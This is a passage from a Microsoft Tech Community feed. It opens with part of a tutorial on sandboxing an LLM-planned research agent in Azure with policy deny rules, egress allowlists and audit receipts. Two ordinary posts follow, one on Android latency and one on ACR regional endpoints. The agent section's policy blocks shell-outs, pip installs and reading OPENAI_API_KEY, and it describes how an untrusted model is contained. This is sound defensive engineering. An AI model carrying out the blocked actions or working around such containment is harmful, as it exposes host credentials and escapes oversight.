&lt;LI data-line="279"&gt;&lt;EM&gt;Host-side, post-exec tripwire.&lt;/EM&gt;&amp;nbsp;After&amp;nbsp;SandboxClient.exec&amp;nbsp;returns, the provider compares the measured&amp;nbsp;duration_seconds&amp;nbsp;against&amp;nbsp;defaults.timeout_seconds&amp;nbsp;and, if the budget was exceeded, sets&amp;nbsp;result.killed=True&amp;nbsp;and a&amp;nbsp;kill_reason&amp;nbsp;on the returned&amp;nbsp;SandboxResult. This is an&amp;nbsp;&lt;STRONG&gt;advisory marker&lt;/STRONG&gt;, not a kill signal: the snippet has already finished, and the sandbox session itself stays alive and reusable. Acting on it (abandoning the session, surfacing a timeout decision) is the agent loop's job — see how run_step in section 6.3 turns it into a "timeout" receipt.&lt;/LI&gt;
&lt;/OL&gt;
&lt;img /&gt;
&lt;P&gt;One PolicyDocument, six enforcement points, three different locations. The model is never trusted; each guarantee is enforced by the component closest to the resource it protects.&lt;/P&gt;
&lt;H2 data-line="324"&gt;6. The example: an LLM-planned research agent&lt;/H2&gt;
&lt;P data-line="326"&gt;The agent does one thing: given a&amp;nbsp;&lt;EM&gt;research ticket&lt;/EM&gt;&amp;nbsp;— a small JSON document like&amp;nbsp;{"topic": "differential privacy", "depth": "survey"}&amp;nbsp;— produce a short literature summary. To do that it needs to (a) read papers from arXiv, (b) skim associated GitHub READMEs, and (c) optionally query a local search index. Nothing else.&lt;/P&gt;
&lt;P data-line="332"&gt;The interesting part is&amp;nbsp;&lt;STRONG&gt;how the agent decides what code to run&lt;/STRONG&gt;. A GPT-class planner is asked to break the ticket into a list of steps, each step a short Python snippet. Those snippets are then executed one at a time — each one passing through the six-point gauntlet from section 5.&lt;/P&gt;
&lt;H3 data-line="338"&gt;6.1 Install&lt;/H3&gt;
&lt;LI-CODE lang="python"&gt;# agt-sandbox with the Azure provider + the policy engine pip install "agt-sandbox[azure,policy]" # Early-access Azure Container Apps sandbox SDK pip install azure-containerapps-sandbox # Optional: only needed for the LLM planner in section 5.3 pip install openai&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;One-time Azure setup (resource group must already exist — the provider auto-creates the &lt;EM&gt;sandbox group&lt;/EM&gt; on first use, but not the resource group):&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;az login az group create --name agents-rg --location westus2 $env:AZURE_SUBSCRIPTION_ID = (az account show --query id -o tsv) $env:AZURE_RG = "agents-rg" $env:AZURE_REGION = "westus2"&lt;/LI-CODE&gt;
&lt;P&gt;Quick smoke check:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sandbox import ACASandboxProvider from agent_os.policies import PolicyDocument print("ok")&lt;/LI-CODE&gt;
&lt;P&gt;Ignore the deprecated warning here. The packages are in the midst of migration and will be fixed soon. &amp;nbsp;&lt;/P&gt;
&lt;H3 data-line="374"&gt;6.2 The policy&lt;/H3&gt;
&lt;P data-line="376"&gt;aca_research_agent.yaml&amp;nbsp;— every field is a&amp;nbsp;&lt;STRONG&gt;native&amp;nbsp;PolicyDocument&amp;nbsp;field&lt;/STRONG&gt;, no Python wrapper:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;name: research-agent version: "2" defaults: action: allow max_cpu: 1.0 # → sandbox CPU cap = 1000 millicores max_memory_mb: 2048 # → sandbox memory cap = 2048 MiB timeout_seconds: 90 # per-execute_code wall-clock kill network_default: deny # fail-closed (also the schema default) network_allowlist: - api.openai.com - api.arxiv.org - export.arxiv.org - "*.github.com" - pypi.org - files.pythonhosted.org tool_allowlist: - fetch_arxiv - fetch_github_readme - search_index rules: - name: deny-shell-out-subprocess condition: { field: code, operator: contains, value: "subprocess" } action: deny priority: 100 message: "shell-out blocked by research-agent policy" - name: deny-pip-install condition: { field: code, operator: contains, value: "pip install" } action: deny priority: 100 message: "ad-hoc dependency installs are not permitted" - name: deny-secret-openai condition: { field: code, operator: contains, value: "OPENAI_API_KEY" } action: deny priority: 100 message: "agents may not read host credentials" # Tool-allowlist gate. Fires only when the eval context carries a # `tool_name` — untagged execute_code calls are unaffected. - name: deny-tool-not-in-allowlist condition: field: tool_name operator: not_in value: [fetch_arxiv, fetch_github_readme, search_index] action: deny priority: 200 message: "tool not in research-agent tool_allowlist"&lt;/LI-CODE&gt;
&lt;P data-line="434"&gt;Two properties to keep in mind:&lt;/P&gt;
&lt;OL data-line="436"&gt;
&lt;LI data-line="436"&gt;&lt;STRONG&gt;Network is fail-closed.&lt;/STRONG&gt;&amp;nbsp;Any host not on&amp;nbsp;network_allowlist&amp;nbsp;is denied at the Azure egress proxy. An empty allowlist produces a sandbox with no outbound network.&lt;/LI&gt;
&lt;LI data-line="439"&gt;&lt;STRONG&gt;tool_allowlist&amp;nbsp;only fires when the call is tagged.&lt;/STRONG&gt;&amp;nbsp;Plain&amp;nbsp;execute_code_async(...)&amp;nbsp;has no&amp;nbsp;tool_name. Calls that pass&amp;nbsp;context={"tool_name": "evil_tool"}&amp;nbsp;get denied host-side.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="443"&gt;Validate before committing:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;python -m agent_os.policies.cli validate aca_research_agent.yaml # OK&lt;/LI-CODE&gt;
&lt;H3 data-line="448"&gt;6.3 The agent&lt;/H3&gt;
&lt;LI-CODE lang="python"&gt;import asyncio, json, os, time, uuid from dataclasses import dataclass from agent_os.policies import PolicyDocument from agent_sandbox import ACASandboxProvider from openai import AsyncOpenAI @dataclass class Step: index: int; intent: str; code: str @dataclass class StepReceipt: step_index: int; intent: str decision: str # allowed | denied-by-policy | blocked-at-egress | timeout | error reason: str | None azure_sandbox_id: str duration_seconds: float stdout_excerpt: str PLANNER_SYSTEM = """You are a research planner. Output JSON of the form {"steps":[{"intent": str, "code": str}, ...]} where each `code` is self-contained Python using only the standard library (use urllib.request for HTTP, not requests). Snippets may reach: api.arxiv.org, export.arxiv.org, *.github.com, pypi.org. No installs, no shell, no secrets.""" async def plan(client: AsyncOpenAI, ticket: dict) -&amp;gt; list[Step]: resp = await client.chat.completions.create( model="gpt-4o-mini", response_format={"type": "json_object"}, messages=[ {"role": "system", "content": PLANNER_SYSTEM}, {"role": "user", "content": json.dumps(ticket)}, ], ) plan = json.loads(resp.choices[0].message.content) return [Step(i, s["intent"], s["code"]) for i, s in enumerate(plan["steps"])] async def run_step(provider, agent_id, session_id, step: Step) -&amp;gt; StepReceipt: started = time.monotonic() try: exec_handle = await provider.execute_code_async( agent_id, session_id, step.code, context={"step_index": step.index, "intent": step.intent}, ) except PermissionError as exc: return StepReceipt(step.index, step.intent, "denied-by-policy", str(exc), session_id, time.monotonic() - started, "") res = exec_handle.result combined = (res.stdout or "") + (res.stderr or "") egress_block = "egress-blocked" in combined or "HTTP Error 403" in combined if getattr(res, "killed", False): decision, reason = "timeout", getattr(res, "kill_reason", "timeout") elif egress_block: decision, reason = "blocked-at-egress", "Azure egress proxy denied a host" elif res.success: decision, reason = "allowed", None else: decision, reason = "error", (res.stderr or "").strip()[:200] return StepReceipt( step.index, step.intent, decision, reason, session_id, time.monotonic() - started, (res.stdout or "").strip()[:200], ) async def main(ticket_path: str) -&amp;gt; None: ticket = json.loads(open(ticket_path, encoding="utf-8").read()) policy = PolicyDocument.from_yaml("aca_research_agent.yaml") missing = [k for k in ("AZURE_SUBSCRIPTION_ID", "AZURE_RG") if not os.environ.get(k)] if missing: raise SystemExit(f"missing env vars: {', '.join(missing)}") provider = ACASandboxProvider( subscription_id=os.environ["AZURE_SUBSCRIPTION_ID"], resource_group=os.environ["AZURE_RG"], sandbox_group="agents", region=os.environ.get("AZURE_REGION", "westus2"), disk="python-3.13", ensure_group_location=os.environ.get("AZURE_REGION", "westus2"), ) if not provider.is_available(): raise SystemExit(provider.unavailable_reason) agent_id = f"research-{uuid.uuid4().hex[:6]}" handle = await provider.create_session_async(agent_id, policy=policy) try: steps = await plan(AsyncOpenAI(), ticket) receipts = [await run_step(provider, agent_id, handle.session_id, s) for s in steps] print(json.dumps([r.__dict__ for r in receipts], indent=2, default=str)) finally: await provider.destroy_session_async(agent_id, handle.session_id) if __name__ == "__main__": import sys asyncio.run(main(sys.argv[1]))&lt;/LI-CODE&gt;
&lt;P&gt;Run it against {"topic": "differential privacy", "depth": "survey"} and you get a JSON array of receipts on stdout — one per planner step. A typical five-step plan produces output along the lines of:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;[ {"step_index": 0, "intent": "fetch arXiv search results", "decision": "allowed", "reason": null, "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 1.42, "stdout_excerpt": "{\"feed\": {\"entry\": [{\"id\": \"http://arxiv.org/abs/2201.12345v2\", ..."}, {"step_index": 1, "intent": "download README for top GitHub repo", "decision": "allowed", "reason": null, "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.88, "stdout_excerpt": "# opendp\n\nThe OpenDP Library is a modular collection..."}, {"step_index": 2, "intent": "shell out to grep README", "decision": "denied-by-policy", "reason": "Policy denied: shell-out blocked by research-agent policy", "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.003, "stdout_excerpt": ""}, {"step_index": 3, "intent": "fetch related blog post from third-party site", "decision": "blocked-at-egress", "reason": "Azure egress proxy denied a host", "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.41, "stdout_excerpt": "egress-blocked HTTPError HTTP Error 403: Forbidden"}, {"step_index": 4, "intent": "summarize collected abstracts", "decision": "allowed", "reason": null, "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.32, "stdout_excerpt": "Summary: differential privacy research in 2024-2026..."} ]&lt;/LI-CODE&gt;
&lt;P data-line="586"&gt;Three things to notice:&lt;/P&gt;
&lt;UL data-line="588"&gt;
&lt;LI data-line="588"&gt;Step 2 (subprocess) was rejected&amp;nbsp;&lt;STRONG&gt;host-side&lt;/STRONG&gt;&amp;nbsp;in ~3 ms with no Azure round-trip —&amp;nbsp;duration_seconds&amp;nbsp;and the empty&amp;nbsp;stdout_excerpt&amp;nbsp;confirm it never left the host process.&lt;/LI&gt;
&lt;LI data-line="591"&gt;Step 3 went to Azure but the egress proxy returned HTTP 403; the caller's&amp;nbsp;try/except&amp;nbsp;converted that into a clean&amp;nbsp;blocked-at-egress&amp;nbsp;decision instead of a hard failure.&lt;/LI&gt;
&lt;LI data-line="594"&gt;The session survives both rejections. Step 4 still runs to completion — denials and egress blocks do not poison the sandbox.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="593"&gt;What you've enforced&lt;/H2&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Concern&lt;/th&gt;&lt;th&gt;Where enforced&lt;/th&gt;&lt;th&gt;Mechanism&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Shell-out, pip-install, credential exfiltration&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;PolicyDocument&amp;nbsp;deny&amp;nbsp;rules →&amp;nbsp;PermissionError&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Subprocess invocation that slips past substring rules&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;enforce_no_subprocess_execution&amp;nbsp;AST scan →&amp;nbsp;SandboxCodeViolation&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Calls to tools outside the allowlist&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;deny-tool-not-in-allowlist&amp;nbsp;rule&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Outbound traffic to disallowed hosts&lt;/td&gt;&lt;td&gt;Azure egress proxy&lt;/td&gt;&lt;td&gt;network_allowlist&amp;nbsp;→&amp;nbsp;EgressPolicy&amp;nbsp;(Deny + per-host Allow)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;CPU / memory ceiling&lt;/td&gt;&lt;td&gt;Azure sandbox VM&lt;/td&gt;&lt;td&gt;defaults.max_cpu&amp;nbsp;/&amp;nbsp;defaults.max_memory_mb&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Per-step wall-clock tripwire&lt;/td&gt;&lt;td&gt;Host, post-exec (advisory)&lt;/td&gt;&lt;td&gt;defaults.timeout_seconds&amp;nbsp;→&amp;nbsp;SandboxResult.killed=True&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Audit trail&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;Per-step receipts from&amp;nbsp;run_step&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P data-line="611"&gt;The model is never trusted. Each guarantee is enforced by the component closest to the resource it protects, and a single signed PolicyDocument drives all of them.&lt;/P&gt;
&lt;H2 data-line="619"&gt;Closing thoughts&lt;/H2&gt;
&lt;P data-line="627"&gt;A few things worth keeping in mind:&lt;/P&gt;
&lt;UL data-line="629"&gt;
&lt;LI data-line="629"&gt;&lt;STRONG&gt;One&amp;nbsp;PolicyDocument&amp;nbsp;is the artefact.&lt;/STRONG&gt;&amp;nbsp;Host-side rules, AST scan, ACA egress proxy, CPU / memory caps, timeouts — all driven by one YAML file. Treat it like code: review it, diff it, and validate it in CI.&lt;/LI&gt;
&lt;LI data-line="633"&gt;&lt;STRONG&gt;Fail-closed by default.&lt;/STRONG&gt;&amp;nbsp;ACA's&amp;nbsp;network_default: deny&amp;nbsp;is the setting you want. Every host the agent reaches should be in the allowlist, by name, in a reviewable diff.&lt;/LI&gt;
&lt;LI data-line="636"&gt;&lt;STRONG&gt;Read the receipts.&lt;/STRONG&gt;&amp;nbsp;StepReceipt&amp;nbsp;JSON is the audit trail. Pipe it into Log Analytics and alert on&amp;nbsp;denied-by-policy&amp;nbsp;and&amp;nbsp;blocked-at-egress&amp;nbsp;spikes — they're either attacks or planner regressions.&lt;/LI&gt;
&lt;LI data-line="640"&gt;&lt;STRONG&gt;The model is never trusted.&lt;/STRONG&gt;&amp;nbsp;Every check in this post exists because the moment you trust the model, you've also trusted whatever fed it its last few tokens.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-line="644"&gt;The project lives at&amp;nbsp;&lt;A href="https://github.com/microsoft/agent-governance-toolkit" target="_blank" rel="noopener" data-href="https://github.com/microsoft/agent-governance-toolkit"&gt;github.com/microsoft/agent-governance-toolkit&lt;/A&gt;. Issues, PRs, and war stories welcome.&lt;/P&gt;</description>
      <pubDate>Fri, 05 Jun 2026 22:40:19 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/govern-ai-agents-using-agent-governance-toolkit-and-azure/ba-p/4526011</guid>
      <dc:creator>amolravande</dc:creator>
      <dc:date>2026-06-05T22:40:19Z</dc:date>
    </item>
    <item>
      <title>ISSUE - Windows App (Android) - Input latency and frozen screens with RemoteApps and handhelds</title>
      <link>https://techcommunity.microsoft.com/t5/azure-virtual-desktop-feedback/issue-windows-app-android-input-latency-and-frozen-screens-with/idi-p/4525730</link>
      <description>&lt;P&gt;Good morning, ladies and gentlemen,&lt;/P&gt;&lt;P&gt;TL;DR: Current Windows App for Android changed something in the background, causing massive latency issues while input.&lt;/P&gt;&lt;P&gt;an announcement from end-user point of view. We are having performance and latency issues for almost eight weeks now with the current Windows App (Android). The issues are showing massive performance latency while giving input to a RemoteApp-connected Windows Terminal Server (WS2022DC).&lt;/P&gt;&lt;P&gt;For troubleshooting measurements, we went through EVERYTHING... Changed GPOs for connecting only via TCP instead of UDP, cleared user profiles, even provisioned new VMs with new update states, went back to March updates.&lt;/P&gt;&lt;P&gt;I never thought, I had to change App version (make this in an enterprise with about 100 handhelds, specifically assigned for warehouse and delivery management) to last January to solve those issues...&lt;/P&gt;&lt;P&gt;We definitely need more transparent patch notes (really Microsoft? 2026 and you push updates without any release notes published, not even known issues?!) and a way to downgrade versions without re-provisioning the whole RDP client for Android...&lt;/P&gt;&lt;P&gt;I am looking forward to hearing from other parts of the world, using RemoteApps with Android handheld scanner and RDS2022.&lt;/P&gt;&lt;P&gt;Best regards,&lt;/P&gt;&lt;P&gt;xSOU1 | Jules&lt;/P&gt;</description>
      <pubDate>Fri, 05 Jun 2026 06:28:37 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-virtual-desktop-feedback/issue-windows-app-android-input-latency-and-frozen-screens-with/idi-p/4525730</guid>
      <dc:creator>xSOU1</dc:creator>
      <dc:date>2026-06-05T06:28:37Z</dc:date>
    </item>
    <item>
      <title>Regional Endpoints for Azure Container Registry Geo-Replication — Now in Public Preview</title>
      <link>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/regional-endpoints-for-azure-container-registry-geo-replication/ba-p/4525717</link>
      <description>&lt;P&gt;By &lt;A class="lia-external-url" href="https://www.linkedin.com/in/johnsonshi/" target="_blank" rel="noopener"&gt;Johnson Shi&lt;/A&gt;, &lt;A class="lia-external-url" href="https://www.linkedin.com/in/zhuyul/" target="_blank" rel="noopener"&gt;Zoey (Zhuyu) Li&lt;/A&gt;, &lt;A class="lia-external-url" href="https://www.linkedin.com/in/huangli-wu-806070126/" target="_blank" rel="noopener"&gt;Huangli Wu&lt;/A&gt;&lt;/P&gt;
&lt;H2 id="what-s-new"&gt;What's new&lt;/H2&gt;
&lt;P&gt;Regional endpoints for geo-replicated Azure Container Registries are now in &lt;STRONG&gt;public preview&lt;/STRONG&gt;. See the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-geo-replication" target="_blank" rel="noopener"&gt;feature's official MS Learn documentation&lt;/A&gt;. If you've been following since the&amp;nbsp;&lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/regional-endpoints-for-geo-replicated-azure-container-registries-private-preview/4496186" target="_blank" rel="noopener" data-lia-auto-title="private preview announcement" data-lia-auto-title-active="0"&gt;private preview announcement&lt;/A&gt;, here's what changed:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;No feature flag registration.&lt;/STRONG&gt; No subscription enrollment so all Azure subscriptions and customers can now use this feature.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;No CLI extension.&lt;/STRONG&gt; Regional endpoints commands are built into &lt;STRONG&gt;Azure CLI 2.86.0+&lt;/STRONG&gt; natively. If you installed the private preview &lt;CODE&gt;acrregionalendpoint&lt;/CODE&gt; extension, uninstall it to avoid conflicts.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Native CLI and portal support.&lt;/STRONG&gt;
&lt;UL&gt;
&lt;LI&gt;With&amp;nbsp;&lt;STRONG&gt;Azure CLI 2.86.0+&lt;/STRONG&gt;, enable regional endpoints for all geo-replicas of a registry with &lt;CODE&gt;az acr create --regional-endpoints enabled&lt;/CODE&gt; or &lt;CODE&gt;az acr update --regional-endpoints enabled&lt;/CODE&gt;.&lt;/LI&gt;
&lt;LI&gt;The Azure portal also supports configuring regional endpoints natively.&lt;/LI&gt;
&lt;/UL&gt;
&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;CLI flag rename for configuring a geo-replica's global endpoint routing (an existing separate feature).&lt;/STRONG&gt; The existing flag&amp;nbsp;&lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt; (on &lt;CODE&gt;az acr replication create/update&lt;/CODE&gt;) has been renamed to &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;.
&lt;UL&gt;
&lt;LI&gt;Key clarifications:
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;"--global-endpoint-routing" (formerly "--region-endpoint-enabled" on "az acr replication create / az acr replication update")&lt;/STRONG&gt; —&amp;nbsp;&lt;STRONG&gt;controls whether a specific geo-replica participates in global endpoint routing&lt;/STRONG&gt;. This is an existing feature that is different from the new registry-level "--regional-endpoints" feature being discussed in this post.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;"--regional-endpoints" (on az "acr create / az acr update") —&amp;nbsp;enables or disables the regional endpoints feature at the registry level for all geo-replicas.&amp;nbsp;&lt;/STRONG&gt;This is the feature discussed in this post.&lt;/LI&gt;
&lt;/UL&gt;
&lt;/LI&gt;
&lt;LI&gt;See the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-endpoint-reference" target="_blank" rel="noopener"&gt;endpoint reference&lt;/A&gt; for the full breakdown of the various registry endpoints (global endpoints, regional endpoints, and data endpoints).&lt;/LI&gt;
&lt;/UL&gt;
&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;STRONG&gt;Regional endpoints are available on &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-skus" target="_blank" rel="noopener"&gt;Premium SKU&lt;/A&gt; registries in all Azure public cloud regions.&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2 id="what-are-regional-endpoints-"&gt;What are regional endpoints?&lt;/H2&gt;
&lt;P&gt;Regional endpoints give you dedicated, per-region login server URLs for each geo-replica with the following URL pattern:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;CODE&gt;myregistry.&lt;STRONG&gt;eastus.geo&lt;/STRONG&gt;.azurecr.io&lt;/CODE&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;CODE&gt;myregistry.&lt;STRONG&gt;westeurope.geo&lt;/STRONG&gt;.azurecr.io&lt;/CODE&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;STRONG&gt;Regional endpoints coexist with the registry's global endpoint &lt;/STRONG&gt;(&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;) — enabling regional endpoints doesn't disable a registry's global endpoint that is backed by Azure-managed routing. You can choose per workload:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;You can use the global endpoint with automatic Azure-managed routing with health-aware failover, where Azure will route your requests to the geo-replica with the best network performance profile to the client.&lt;/LI&gt;
&lt;LI&gt;You can use a regional endpoint when you need explicit control or routing to a specific geo-replica.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Other resources:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;For the full background on &lt;EM&gt;why&lt;/EM&gt; regional endpoints exist and the problems they solve, see the &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/regional-endpoints-for-geo-replicated-azure-container-registries-private-preview/4496186" target="_blank" rel="noopener" data-lia-auto-title="private preview blog post" data-lia-auto-title-active="0"&gt;private preview blog post&lt;/A&gt;.&lt;/LI&gt;
&lt;LI&gt;For the complete operational deep dive — health-aware failover, throttling considerations, storage quota and pricing, eventual consistency, home region outage behavior, DNS propagation, private endpoint interaction, capacity planning, and monitoring guidance — see&amp;nbsp;&lt;A class="lia-external-url" href="https://gist.github.com/johnsonshi/0034f8fdc014da64242ffdb8b632709e" target="_blank" rel="noopener"&gt;How ACR geo-replication handles failover, failback, and traffic redirection&lt;/A&gt;.&lt;/LI&gt;
&lt;LI&gt;For the behind-the-scenes engineering implementation — architectural overview and the engineering system design of the feature — see &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/determinism-over-magic-the-engineering-design-behind-azure-container-registry-re/4524101" target="_blank" rel="noopener" data-lia-auto-title="Determinism over magic: the engineering design behind Azure Container Registry Regional Endpoints" data-lia-auto-title-active="0"&gt;Determinism over magic: the engineering design behind Azure Container Registry Regional Endpoints&lt;/A&gt;.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 id="getting-started"&gt;Getting started&lt;/H2&gt;
&lt;P&gt;&lt;STRONG&gt;Enable regional endpoints on an existing registry:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az acr update -n myregistry -g myrg --regional-endpoints enabled
&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;View all registry endpoint URLs, including the registry global endpoint, geo-replica regional endpoints, and data endpoints:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az acr show-endpoints --name myregistry --resource-group myrg
&lt;/LI-CODE&gt;
&lt;H2&gt;Using regional endpoints&lt;/H2&gt;
&lt;P&gt;&lt;STRONG&gt;Authenticate to a specific regional endpoint:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az acr login --name myregistry --endpoint eastus
&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;Push to a specific geo-replica.&lt;/STRONG&gt;&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Images and tags pushed to a geo-replica via regional endpoints still propagate to all other geo-replicas under&amp;nbsp;&lt;U&gt;eventual consistency&lt;/U&gt;.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;LI-CODE lang="bash"&gt;docker tag   myapp:v1  myregistry.eastus.geo.azurecr.io/myapp:v1
docker push            myregistry.eastus.geo.azurecr.io/myapp:v1
&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;Pull an image:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;docker pull myregistry.eastus.geo.azurecr.io/myapp:v1&lt;/LI-CODE&gt;
&lt;P&gt;You can specify regional endpoints directly in Kubernetes deployment manifests if you need to pin workloads to specific regions. This ensures clusters in specific regions always pull from their colocated replica, providing predictable routing and reduced latency.&lt;/P&gt;
&lt;P&gt;By using different regional endpoints in each cluster's manifests, you can choose to guarantee that each cluster pulls from its local replica instead of relying on Azure-managed routing.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;East US cluster deployment:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-eastus
spec:
  template:
    spec:
      containers:
      - name: myapp
        image: myregistry.eastus.geo.azurecr.io/myapp:v1&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;West Europe cluster deployment:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-westeurope
spec:
  template:
    spec:
      containers:
      - name: myapp
        image: myregistry.westeurope.geo.azurecr.io/myapp:v1&lt;/LI-CODE&gt;
&lt;H2 id="when-to-use-regional-endpoints"&gt;When to use regional endpoints&lt;/H2&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Scenario&lt;/th&gt;&lt;th&gt;What to do&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Most workloads&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Keep using the global endpoint (&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;). Health-aware failover handles routing automatically.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Pin AKS clusters to co-located replicas&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Use regional endpoint URLs in deployment manifests.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;CI/CD push-then-pull consistency&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Pin pushes to a regional endpoint to avoid eventual-consistency races.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Client-side failover&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Switch between regional endpoints based on your own health checks.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Capacity planning&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Spread workloads across multiple regional endpoints to avoid per-replica throttling.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Troubleshooting&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Target a specific geo-replica to reproduce or isolate an issue.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H2 id="what-changed-from-private-preview"&gt;What changed from private preview&lt;/H2&gt;
